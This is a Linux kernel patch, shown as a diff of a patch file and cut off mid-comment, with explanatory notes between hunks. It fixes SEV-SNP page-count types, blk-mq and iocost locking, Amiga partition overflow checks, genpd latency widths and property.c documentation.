+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -187,12 +187,12 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ }
+ void setup_ghcb(void);
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned int npages);
++					 unsigned long npages);
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned int npages);
++					unsigned long npages);
+ void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op);
+-void snp_set_memory_shared(unsigned long vaddr, unsigned int npages);
+-void snp_set_memory_private(unsigned long vaddr, unsigned int npages);
++void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
++void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+@@ -207,12 +207,12 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs) { return 0; }
+ static inline void setup_ghcb(void) { }
+ static inline void __init
+-early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned int npages) { }
++early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init
+-early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned int npages) { }
++early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op) { }
+-static inline void snp_set_memory_shared(unsigned long vaddr, unsigned int npages) { }
+-static inline void snp_set_memory_private(unsigned long vaddr, unsigned int npages) { }
++static inline void snp_set_memory_shared(unsigned long vaddr, unsigned long npages) { }
++static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index c1c8c581759d6..034e62838b284 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -150,7 +150,7 @@ struct x86_init_acpi {
+  * @enc_cache_flush_required	Returns true if a cache flush is needed before changing page encryption status
+  */
+ struct x86_guest {
+-	void (*enc_status_change_prepare)(unsigned long vaddr, int npages, bool enc);
++	bool (*enc_status_change_prepare)(unsigned long vaddr, int npages, bool enc);
+ 	bool (*enc_status_change_finish)(unsigned long vaddr, int npages, bool enc);
+ 	bool (*enc_tlb_flush_required)(bool enc);
+ 	bool (*enc_cache_flush_required)(void);
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index c7f1c7cb1963b..15ee89ce8c68c 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -731,11 +731,15 @@ unlock:
+ static void show_rdt_tasks(struct rdtgroup *r, struct seq_file *s)
+ {
+ 	struct task_struct *p, *t;
++	pid_t pid;
+ 
+ 	rcu_read_lock();
+ 	for_each_process_thread(p, t) {
+-		if (is_closid_match(t, r) || is_rmid_match(t, r))
+-			seq_printf(s, "%d\n", t->pid);
++		if (is_closid_match(t, r) || is_rmid_match(t, r)) {
++			pid = task_pid_vnr(t);
++			if (pid)
++				seq_printf(s, "%d\n", pid);
++		}
+ 	}
+ 	rcu_read_unlock();
+ }
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index c680ac6342bb3..afda719dd7253 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -643,7 +643,7 @@ static u64 __init get_jump_table_addr(void)
+ 	return ret;
+ }
+ 
+-static void pvalidate_pages(unsigned long vaddr, unsigned int npages, bool validate)
++static void pvalidate_pages(unsigned long vaddr, unsigned long npages, bool validate)
+ {
+ 	unsigned long vaddr_end;
+ 	int rc;
+@@ -660,7 +660,7 @@ static void pvalidate_pages(unsigned long vaddr, unsigned int npages, bool valid
+ 	}
+ }
+ 
+-static void __init early_set_pages_state(unsigned long paddr, unsigned int npages, enum psc_op op)
++static void __init early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
+ {
+ 	unsigned long paddr_end;
+ 	u64 val;
+@@ -699,7 +699,7 @@ e_term:
+ }
+ 
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned int npages)
++					 unsigned long npages)
+ {
+ 	/*
+ 	 * This can be invoked in early boot while running identity mapped, so
+@@ -721,7 +721,7 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ }
+ 
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned int npages)
++					unsigned long npages)
+ {
+ 	/*
+ 	 * This can be invoked in early boot while running identity mapped, so
+@@ -877,7 +877,7 @@ static void __set_pages_state(struct snp_psc_desc *data, unsigned long vaddr,
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_PSC);
+ }
+ 
+-static void set_pages_state(unsigned long vaddr, unsigned int npages, int op)
++static void set_pages_state(unsigned long vaddr, unsigned long npages, int op)
+ {
+ 	unsigned long vaddr_end, next_vaddr;
+ 	struct snp_psc_desc *desc;
+@@ -902,7 +902,7 @@ static void set_pages_state(unsigned long vaddr, unsigned int npages, int op)
+ 	kfree(desc);
+ }
+ 
+-void snp_set_memory_shared(unsigned long vaddr, unsigned int npages)
++void snp_set_memory_shared(unsigned long vaddr, unsigned long npages)
+ {
+ 	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return;
+@@ -912,7 +912,7 @@ void snp_set_memory_shared(unsigned long vaddr, unsigned int npages)
+ 	set_pages_state(vaddr, npages, SNP_PAGE_STATE_SHARED);
+ }
+ 
+-void snp_set_memory_private(unsigned long vaddr, unsigned int npages)
++void snp_set_memory_private(unsigned long vaddr, unsigned long npages)
+ {
+ 	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return;
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 10622cf2b30f4..41e5b4cb898c3 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -130,7 +130,7 @@ struct x86_cpuinit_ops x86_cpuinit = {
+ 
+ static void default_nmi_init(void) { };
+ 
+-static void enc_status_change_prepare_noop(unsigned long vaddr, int npages, bool enc) { }
++static bool enc_status_change_prepare_noop(unsigned long vaddr, int npages, bool enc) { return true; }
+ static bool enc_status_change_finish_noop(unsigned long vaddr, int npages, bool enc) { return false; }
+ static bool enc_tlb_flush_required_noop(bool enc) { return false; }
+ static bool enc_cache_flush_required_noop(void) { return false; }
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 9c4d8dbcb1296..ff6c0462beee7 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -319,7 +319,7 @@ static void enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
+ #endif
+ }
+ 
+-static void amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool enc)
++static bool amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool enc)
+ {
+ 	/*
+ 	 * To maintain the security guarantees of SEV-SNP guests, make sure
+@@ -327,6 +327,8 @@ static void amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool
+ 	 */
+ 	if (cc_platform_has(CC_ATTR_GUEST_SEV_SNP) && !enc)
+ 		snp_set_memory_shared(vaddr, npages);
++
++	return true;
+ }
+ 
+ /* Return true unconditionally: return value doesn't matter for the SEV side */
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 2e5a045731dec..5f0ce77a259d8 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -2096,7 +2096,8 @@ static int __set_memory_enc_pgtable(unsigned long addr, int numpages, bool enc)
+ 		cpa_flush(&cpa, x86_platform.guest.enc_cache_flush_required());
+ 
+ 	/* Notify hypervisor that we are about to set/clr encryption attribute. */
+-	x86_platform.guest.enc_status_change_prepare(addr, numpages, enc);
++	if (!x86_platform.guest.enc_status_change_prepare(addr, numpages, enc))
++		return -EIO;
+ 
+ 	ret = __change_page_attr_set_clr(&cpa, 1);
+ 
+diff --git a/arch/x86/platform/efi/efi_64.c b/arch/x86/platform/efi/efi_64.c
+index b36596bf0fc38..601908bdbeadc 100644
+--- a/arch/x86/platform/efi/efi_64.c
++++ b/arch/x86/platform/efi/efi_64.c
+@@ -847,9 +847,9 @@ efi_set_virtual_address_map(unsigned long memory_map_size,
+ 
+ 	/* Disable interrupts around EFI calls: */
+ 	local_irq_save(flags);
+-	status = efi_call(efi.runtime->set_virtual_address_map,
+-			  memory_map_size, descriptor_size,
+-			  descriptor_version, virtual_map);
++	status = arch_efi_call_virt(efi.runtime, set_virtual_address_map,
++				    memory_map_size, descriptor_size,
++				    descriptor_version, virtual_map);
+ 	local_irq_restore(flags);
+ 
+ 	efi_fpu_end();
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 00d59d2288f00..7dd6a33e1d6a8 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -2437,6 +2437,7 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	u32 hwi, adj_step;
+ 	s64 margin;
+ 	u64 cost, new_inuse;
++	unsigned long flags;
+ 
+ 	current_hweight(iocg, NULL, &hwi);
+ 	old_hwi = hwi;
+@@ -2455,11 +2456,11 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	    iocg->inuse == iocg->active)
+ 		return cost;
+ 
+-	spin_lock_irq(&ioc->lock);
++	spin_lock_irqsave(&ioc->lock, flags);
+ 
+ 	/* we own inuse only when @iocg is in the normal active state */
+ 	if (iocg->abs_vdebt || list_empty(&iocg->active_list)) {
+-		spin_unlock_irq(&ioc->lock);
++		spin_unlock_irqrestore(&ioc->lock, flags);
+ 		return cost;
+ 	}
+ 
+@@ -2480,7 +2481,7 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	} while (time_after64(vtime + cost, now->vnow) &&
+ 		 iocg->inuse != iocg->active);
+ 
+-	spin_unlock_irq(&ioc->lock);
++	spin_unlock_irqrestore(&ioc->lock, flags);
+ 
+ 	TRACE_IOCG_PATH(inuse_adjust, iocg, now,
+ 			old_inuse, iocg->inuse, old_hwi, hwi);
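
The irqsave conversion matters because adjust_inuse_and_calc_cost() can be
reached from contexts that already run with interrupts disabled, and
spin_unlock_irq() would unconditionally turn them back on. The general shape,
as a sketch:

static void adjust_sketch(struct ioc *ioc)
{
	unsigned long flags;

	spin_lock_irqsave(&ioc->lock, flags);	/* records the current IRQ state */
	/* ... adjust iocg->inuse ... */
	spin_unlock_irqrestore(&ioc->lock, flags);	/* restores exactly that state */
}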
+diff --git a/block/blk-mq-debugfs.c b/block/blk-mq-debugfs.c
+index bd942341b6382..7675e663df365 100644
+--- a/block/blk-mq-debugfs.c
++++ b/block/blk-mq-debugfs.c
+@@ -427,7 +427,7 @@ static void blk_mq_debugfs_tags_show(struct seq_file *m,
+ 	seq_printf(m, "nr_tags=%u\n", tags->nr_tags);
+ 	seq_printf(m, "nr_reserved_tags=%u\n", tags->nr_reserved_tags);
+ 	seq_printf(m, "active_queues=%d\n",
+-		   atomic_read(&tags->active_queues));
++		   READ_ONCE(tags->active_queues));
+ 
+ 	seq_puts(m, "\nbitmap_tags:\n");
+ 	sbitmap_queue_show(&tags->bitmap_tags, m);
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index a80d7c62bdfe6..100889c276c3f 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -40,6 +40,7 @@ static void blk_mq_update_wake_batch(struct blk_mq_tags *tags,
+ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
++	struct blk_mq_tags *tags = hctx->tags;
+ 
+ 	/*
+ 	 * calling test_bit() prior to test_and_set_bit() is intentional,
+@@ -57,9 +58,11 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	users = atomic_inc_return(&hctx->tags->active_queues);
+-
+-	blk_mq_update_wake_batch(hctx->tags, users);
++	spin_lock_irq(&tags->lock);
++	users = tags->active_queues + 1;
++	WRITE_ONCE(tags->active_queues, users);
++	blk_mq_update_wake_batch(tags, users);
++	spin_unlock_irq(&tags->lock);
+ }
+ 
+ /*
+@@ -92,9 +95,11 @@ void __blk_mq_tag_idle(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	users = atomic_dec_return(&tags->active_queues);
+-
++	spin_lock_irq(&tags->lock);
++	users = tags->active_queues - 1;
++	WRITE_ONCE(tags->active_queues, users);
+ 	blk_mq_update_wake_batch(tags, users);
++	spin_unlock_irq(&tags->lock);
+ 
+ 	blk_mq_tag_wakeup_all(tags, false);
+ }
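
The atomic counter becomes a plain integer so that the counter and the derived
wake batch are updated under one lock, while the hot path keeps reading without
it. The writer/reader split, as a sketch:

static void writer_side(struct blk_mq_tags *tags)
{
	spin_lock_irq(&tags->lock);
	WRITE_ONCE(tags->active_queues, tags->active_queues + 1);
	blk_mq_update_wake_batch(tags, tags->active_queues);
	spin_unlock_irq(&tags->lock);	/* counter and batch change together */
}

static unsigned int reader_side(struct blk_mq_tags *tags)
{
	/* lockless: a momentarily stale value only skews fairness, not safety */
	return READ_ONCE(tags->active_queues);
}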
+diff --git a/block/blk-mq.h b/block/blk-mq.h
+index 0b2870839cdd6..c6eca452ea2a2 100644
+--- a/block/blk-mq.h
++++ b/block/blk-mq.h
+@@ -362,8 +362,7 @@ static inline bool hctx_may_queue(struct blk_mq_hw_ctx *hctx,
+ 			return true;
+ 	}
+ 
+-	users = atomic_read(&hctx->tags->active_queues);
+-
++	users = READ_ONCE(hctx->tags->active_queues);
+ 	if (!users)
+ 		return true;
+ 
+diff --git a/block/disk-events.c b/block/disk-events.c
+index aee25a7e1ab7d..450c2cbe23d56 100644
+--- a/block/disk-events.c
++++ b/block/disk-events.c
+@@ -307,6 +307,7 @@ bool disk_force_media_change(struct gendisk *disk, unsigned int events)
+ 	if (!(events & DISK_EVENT_MEDIA_CHANGE))
+ 		return false;
+ 
++	inc_diskseq(disk);
+ 	if (__invalidate_device(disk->part0, true))
+ 		pr_warn("VFS: busy inodes on changed media %s\n",
+ 			disk->disk_name);
+diff --git a/block/genhd.c b/block/genhd.c
+index 62a61388e752d..afab646d12c85 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -25,8 +25,9 @@
+ #include <linux/pm_runtime.h>
+ #include <linux/badblocks.h>
+ #include <linux/part_stat.h>
+-#include "blk-throttle.h"
++#include <linux/blktrace_api.h>
+ 
++#include "blk-throttle.h"
+ #include "blk.h"
+ #include "blk-mq-sched.h"
+ #include "blk-rq-qos.h"
+@@ -1181,6 +1182,8 @@ static void disk_release(struct device *dev)
+ 	might_sleep();
+ 	WARN_ON_ONCE(disk_live(disk));
+ 
++	blk_trace_remove(disk->queue);
++
+ 	/*
+ 	 * To undo the all initialization from blk_mq_init_allocated_queue in
+ 	 * case of a probe failure where add_disk is never called we have to
+diff --git a/block/partitions/amiga.c b/block/partitions/amiga.c
+index 5c8624e26a54c..5069210954129 100644
+--- a/block/partitions/amiga.c
++++ b/block/partitions/amiga.c
+@@ -11,10 +11,18 @@
+ #define pr_fmt(fmt) fmt
+ 
+ #include <linux/types.h>
++#include <linux/mm_types.h>
++#include <linux/overflow.h>
+ #include <linux/affs_hardblocks.h>
+ 
+ #include "check.h"
+ 
++/* magic offsets in partition DosEnvVec */
++#define NR_HD	3
++#define NR_SECT	5
++#define LO_CYL	9
++#define HI_CYL	10
++
+ static __inline__ u32
+ checksum_block(__be32 *m, int size)
+ {
+@@ -31,8 +39,12 @@ int amiga_partition(struct parsed_partitions *state)
+ 	unsigned char *data;
+ 	struct RigidDiskBlock *rdb;
+ 	struct PartitionBlock *pb;
+-	int start_sect, nr_sects, blk, part, res = 0;
+-	int blksize = 1;	/* Multiplier for disk block size */
++	u64 start_sect, nr_sects;
++	sector_t blk, end_sect;
++	u32 cylblk;		/* rdb_CylBlocks = nr_heads*sect_per_track */
++	u32 nr_hd, nr_sect, lo_cyl, hi_cyl;
++	int part, res = 0;
++	unsigned int blksize = 1;	/* Multiplier for disk block size */
+ 	int slot = 1;
+ 
+ 	for (blk = 0; ; blk++, put_dev_sector(sect)) {
+@@ -40,7 +52,7 @@ int amiga_partition(struct parsed_partitions *state)
+ 			goto rdb_done;
+ 		data = read_part_sector(state, blk, &sect);
+ 		if (!data) {
+-			pr_err("Dev %s: unable to read RDB block %d\n",
++			pr_err("Dev %s: unable to read RDB block %llu\n",
+ 			       state->disk->disk_name, blk);
+ 			res = -1;
+ 			goto rdb_done;
+@@ -57,12 +69,12 @@ int amiga_partition(struct parsed_partitions *state)
+ 		*(__be32 *)(data+0xdc) = 0;
+ 		if (checksum_block((__be32 *)data,
+ 				be32_to_cpu(rdb->rdb_SummedLongs) & 0x7F)==0) {
+-			pr_err("Trashed word at 0xd0 in block %d ignored in checksum calculation\n",
++			pr_err("Trashed word at 0xd0 in block %llu ignored in checksum calculation\n",
+ 			       blk);
+ 			break;
+ 		}
+ 
+-		pr_err("Dev %s: RDB in block %d has bad checksum\n",
++		pr_err("Dev %s: RDB in block %llu has bad checksum\n",
+ 		       state->disk->disk_name, blk);
+ 	}
+ 
+@@ -78,11 +90,16 @@ int amiga_partition(struct parsed_partitions *state)
+ 	}
+ 	blk = be32_to_cpu(rdb->rdb_PartitionList);
+ 	put_dev_sector(sect);
+-	for (part = 1; blk>0 && part<=16; part++, put_dev_sector(sect)) {
+-		blk *= blksize;	/* Read in terms partition table understands */
++	for (part = 1; (s32) blk>0 && part<=16; part++, put_dev_sector(sect)) {
++		/* Read in terms the partition table understands */
++		if (check_mul_overflow(blk, (sector_t) blksize, &blk)) {
++			pr_err("Dev %s: overflow calculating partition block %llu! Skipping partitions %u and beyond\n",
++				state->disk->disk_name, blk, part);
++			break;
++		}
+ 		data = read_part_sector(state, blk, &sect);
+ 		if (!data) {
+-			pr_err("Dev %s: unable to read partition block %d\n",
++			pr_err("Dev %s: unable to read partition block %llu\n",
+ 			       state->disk->disk_name, blk);
+ 			res = -1;
+ 			goto rdb_done;
+@@ -94,19 +111,70 @@ int amiga_partition(struct parsed_partitions *state)
+ 		if (checksum_block((__be32 *)pb, be32_to_cpu(pb->pb_SummedLongs) & 0x7F) != 0 )
+ 			continue;
+ 
+-		/* Tell Kernel about it */
++		/* RDB gives us more than enough rope to hang ourselves with,
++		 * many times over (2^128 bytes if all fields max out).
++		 * Some careful checks are in order, so check for potential
++		 * overflows.
++		 * We are multiplying four 32-bit numbers into one sector_t!
++		 */
++
++		nr_hd   = be32_to_cpu(pb->pb_Environment[NR_HD]);
++		nr_sect = be32_to_cpu(pb->pb_Environment[NR_SECT]);
++
++		/* CylBlocks is total number of blocks per cylinder */
++		if (check_mul_overflow(nr_hd, nr_sect, &cylblk)) {
++			pr_err("Dev %s: heads*sects %u overflows u32, skipping partition!\n",
++				state->disk->disk_name, cylblk);
++			continue;
++		}
++
++		/* check for consistency with RDB defined CylBlocks */
++		if (cylblk > be32_to_cpu(rdb->rdb_CylBlocks)) {
++			pr_warn("Dev %s: cylblk %u > rdb_CylBlocks %u!\n",
++				state->disk->disk_name, cylblk,
++				be32_to_cpu(rdb->rdb_CylBlocks));
++		}
++
++		/* RDB allows for variable logical block size -
++		 * normalize to 512 byte blocks and check result.
++		 */
++
++		if (check_mul_overflow(cylblk, blksize, &cylblk)) {
++			pr_err("Dev %s: partition %u bytes per cyl. overflows u32, skipping partition!\n",
++				state->disk->disk_name, part);
++			continue;
++		}
++
++		/* Calculate partition start and end. Limit of 32 bit on cylblk
++		 * guarantees no overflow occurs if LBD support is enabled.
++		 */
++
++		lo_cyl = be32_to_cpu(pb->pb_Environment[LO_CYL]);
++		start_sect = ((u64) lo_cyl * cylblk);
++
++		hi_cyl = be32_to_cpu(pb->pb_Environment[HI_CYL]);
++		nr_sects = (((u64) hi_cyl - lo_cyl + 1) * cylblk);
+ 
+-		nr_sects = (be32_to_cpu(pb->pb_Environment[10]) + 1 -
+-			    be32_to_cpu(pb->pb_Environment[9])) *
+-			   be32_to_cpu(pb->pb_Environment[3]) *
+-			   be32_to_cpu(pb->pb_Environment[5]) *
+-			   blksize;
+ 		if (!nr_sects)
+ 			continue;
+-		start_sect = be32_to_cpu(pb->pb_Environment[9]) *
+-			     be32_to_cpu(pb->pb_Environment[3]) *
+-			     be32_to_cpu(pb->pb_Environment[5]) *
+-			     blksize;
++
++		/* Warn user if partition end overflows u32 (AmigaDOS limit) */
++
++		if ((start_sect + nr_sects) > UINT_MAX) {
++			pr_warn("Dev %s: partition %u (%llu-%llu) needs 64 bit device support!\n",
++				state->disk->disk_name, part,
++				start_sect, start_sect + nr_sects);
++		}
++
++		if (check_add_overflow(start_sect, nr_sects, &end_sect)) {
++			pr_err("Dev %s: partition %u (%llu-%llu) needs LBD device support, skipping partition!\n",
++				state->disk->disk_name, part,
++				start_sect, end_sect);
++			continue;
++		}
++
++		/* Tell Kernel about it */
++
+ 		put_partition(state,slot++,start_sect,nr_sects);
+ 		{
+ 			/* Be even more informative to aid mounting */
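
The rewritten amiga.c code leans on check_mul_overflow()/check_add_overflow() from <linux/overflow.h>, which wrap the compiler's checked-arithmetic builtins. A standalone userspace sketch of the same guards, using the underlying GCC/Clang builtins directly (the values are made up to force the overflows):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
            uint32_t nr_hd = 0x10000, nr_sect = 0x10000, cylblk;
            uint64_t start_sect = UINT64_MAX - 10, nr_sects = 100, end_sect;

            /* check_mul_overflow(a, b, &res) is built on this builtin */
            if (__builtin_mul_overflow(nr_hd, nr_sect, &cylblk))
                    printf("heads*sects overflows u32, skip partition\n");

            /* check_add_overflow(a, b, &res) likewise */
            if (__builtin_add_overflow(start_sect, nr_sects, &end_sect))
                    printf("partition end overflows u64, skip partition\n");
            return 0;
    }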
+diff --git a/crypto/jitterentropy.c b/crypto/jitterentropy.c
+index 22f48bf4c6f57..227cedfa4f0ae 100644
+--- a/crypto/jitterentropy.c
++++ b/crypto/jitterentropy.c
+@@ -117,7 +117,6 @@ struct rand_data {
+ 				   * zero). */
+ #define JENT_ESTUCK		8 /* Too many stuck results during init. */
+ #define JENT_EHEALTH		9 /* Health test failed during initialization */
+-#define JENT_ERCT		10 /* RCT failed during initialization */
+ 
+ /*
+  * The output n bits can receive more than n bits of min entropy, of course,
+@@ -762,14 +761,12 @@ int jent_entropy_init(void)
+ 			if ((nonstuck % JENT_APT_WINDOW_SIZE) == 0) {
+ 				jent_apt_reset(&ec,
+ 					       delta & JENT_APT_WORD_MASK);
+-				if (jent_health_failure(&ec))
+-					return JENT_EHEALTH;
+ 			}
+ 		}
+ 
+-		/* Validate RCT */
+-		if (jent_rct_failure(&ec))
+-			return JENT_ERCT;
++		/* Validate health test result */
++		if (jent_health_failure(&ec))
++			return JENT_EHEALTH;
+ 
+ 		/* test whether we have an increasing timer */
+ 		if (!(time2 > time))
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index b411201f75bfb..56ceba4698024 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -1624,9 +1624,6 @@ static int genpd_add_device(struct generic_pm_domain *genpd, struct device *dev,
+ 
+ 	dev_dbg(dev, "%s()\n", __func__);
+ 
+-	if (IS_ERR_OR_NULL(genpd) || IS_ERR_OR_NULL(dev))
+-		return -EINVAL;
+-
+ 	gpd_data = genpd_alloc_dev_data(dev, gd);
+ 	if (IS_ERR(gpd_data))
+ 		return PTR_ERR(gpd_data);
+@@ -1668,6 +1665,9 @@ int pm_genpd_add_device(struct generic_pm_domain *genpd, struct device *dev)
+ {
+ 	int ret;
+ 
++	if (!genpd || !dev)
++		return -EINVAL;
++
+ 	mutex_lock(&gpd_list_lock);
+ 	ret = genpd_add_device(genpd, dev, dev);
+ 	mutex_unlock(&gpd_list_lock);
+@@ -2514,6 +2514,9 @@ int of_genpd_add_device(struct of_phandle_args *genpdspec, struct device *dev)
+ 	struct generic_pm_domain *genpd;
+ 	int ret;
+ 
++	if (!dev)
++		return -EINVAL;
++
+ 	mutex_lock(&gpd_list_lock);
+ 
+ 	genpd = genpd_get_from_provider(genpdspec);
+@@ -2923,10 +2926,10 @@ static int genpd_parse_state(struct genpd_power_state *genpd_state,
+ 
+ 	err = of_property_read_u32(state_node, "min-residency-us", &residency);
+ 	if (!err)
+-		genpd_state->residency_ns = 1000 * residency;
++		genpd_state->residency_ns = 1000LL * residency;
+ 
+-	genpd_state->power_on_latency_ns = 1000 * exit_latency;
+-	genpd_state->power_off_latency_ns = 1000 * entry_latency;
++	genpd_state->power_on_latency_ns = 1000LL * exit_latency;
++	genpd_state->power_off_latency_ns = 1000LL * entry_latency;
+ 	genpd_state->fwnode = &state_node->fwnode;
+ 
+ 	return 0;
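
The genpd_parse_state() fix is a classic width bug worth a worked example: residency and the latencies are 32-bit values, so 1000 * residency is computed in 32-bit arithmetic and silently wraps before being widened for the s64 assignment; the LL suffix forces the multiply itself to 64 bits. A tiny standalone demonstration (the residency value is made up):

    #include <stdint.h>
    #include <stdio.h>

    int main(void)
    {
            uint32_t residency_us = 5000000;       /* 5s > UINT32_MAX/1000 */
            int64_t wrong = 1000 * residency_us;   /* 32-bit mul: wraps   */
            int64_t right = 1000LL * residency_us; /* 64-bit mul: exact   */

            /* prints wrong=705032704 right=5000000000 */
            printf("wrong=%lld right=%lld\n", (long long)wrong,
                   (long long)right);
            return 0;
    }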
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index 7f338cb4fb7b8..b0c40d9734847 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -30,6 +30,8 @@ EXPORT_SYMBOL_GPL(dev_fwnode);
+  * @propname: Name of the property
+  *
+  * Check if property @propname is present in the device firmware description.
++ *
++ * Return: true if property @propname is present. Otherwise, returns false.
+  */
+ bool device_property_present(struct device *dev, const char *propname)
+ {
+@@ -41,6 +43,8 @@ EXPORT_SYMBOL_GPL(device_property_present);
+  * fwnode_property_present - check if a property of a firmware node is present
+  * @fwnode: Firmware node whose property to check
+  * @propname: Name of the property
++ *
++ * Return: true if property @propname is present. Otherwise, returns false.
+  */
+ bool fwnode_property_present(const struct fwnode_handle *fwnode,
+ 			     const char *propname)
+@@ -500,10 +504,10 @@ EXPORT_SYMBOL_GPL(fwnode_property_match_string);
+  * Obtain a reference based on a named property in an fwnode, with
+  * integer arguments.
+  *
+- * Caller is responsible to call fwnode_handle_put() on the returned
+- * args->fwnode pointer.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * @args->fwnode pointer.
+  *
+- * Returns: %0 on success
++ * Return: %0 on success
+  *	    %-ENOENT when the index is out of bounds, the index has an empty
+  *		     reference or the property was not found
+  *	    %-EINVAL on parse error
+@@ -539,8 +543,11 @@ EXPORT_SYMBOL_GPL(fwnode_property_get_reference_args);
+  *
+  * @index can be used when the named reference holds a table of references.
+  *
+- * Returns pointer to the reference fwnode, or ERR_PTR. Caller is responsible to
+- * call fwnode_handle_put() on the returned fwnode pointer.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: a pointer to the reference fwnode, when found. Otherwise,
++ * returns an error pointer.
+  */
+ struct fwnode_handle *fwnode_find_reference(const struct fwnode_handle *fwnode,
+ 					    const char *name,
+@@ -559,7 +566,7 @@ EXPORT_SYMBOL_GPL(fwnode_find_reference);
+  * fwnode_get_name - Return the name of a node
+  * @fwnode: The firmware node
+  *
+- * Returns a pointer to the node name.
++ * Return: a pointer to the node name, or %NULL.
+  */
+ const char *fwnode_get_name(const struct fwnode_handle *fwnode)
+ {
+@@ -571,7 +578,7 @@ EXPORT_SYMBOL_GPL(fwnode_get_name);
+  * fwnode_get_name_prefix - Return the prefix of node for printing purposes
+  * @fwnode: The firmware node
+  *
+- * Returns the prefix of a node, intended to be printed right before the node.
++ * Return: the prefix of a node, intended to be printed right before the node.
+  * The prefix works also as a separator between the nodes.
+  */
+ const char *fwnode_get_name_prefix(const struct fwnode_handle *fwnode)
+@@ -583,7 +590,10 @@ const char *fwnode_get_name_prefix(const struct fwnode_handle *fwnode)
+  * fwnode_get_parent - Return parent firmware node
+  * @fwnode: Firmware whose parent is retrieved
+  *
+- * Return parent firmware node of the given node if possible or %NULL if no
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer.
++ *
++ * Return: parent firmware node of the given node if possible or %NULL if no
+  * parent was available.
+  */
+ struct fwnode_handle *fwnode_get_parent(const struct fwnode_handle *fwnode)
+@@ -600,8 +610,12 @@ EXPORT_SYMBOL_GPL(fwnode_get_parent);
+  * on the passed node, making it suitable for iterating through a
+  * node's parents.
+  *
+- * Returns a node pointer with refcount incremented, use
+- * fwnode_handle_node() on it when done.
++ * The caller is responsible for calling fwnode_handle_put() on the returned
++ * fwnode pointer. Note that this function also puts a reference to @fwnode
++ * unconditionally.
++ *
++ * Return: parent firmware node of the given node if possible or %NULL if no
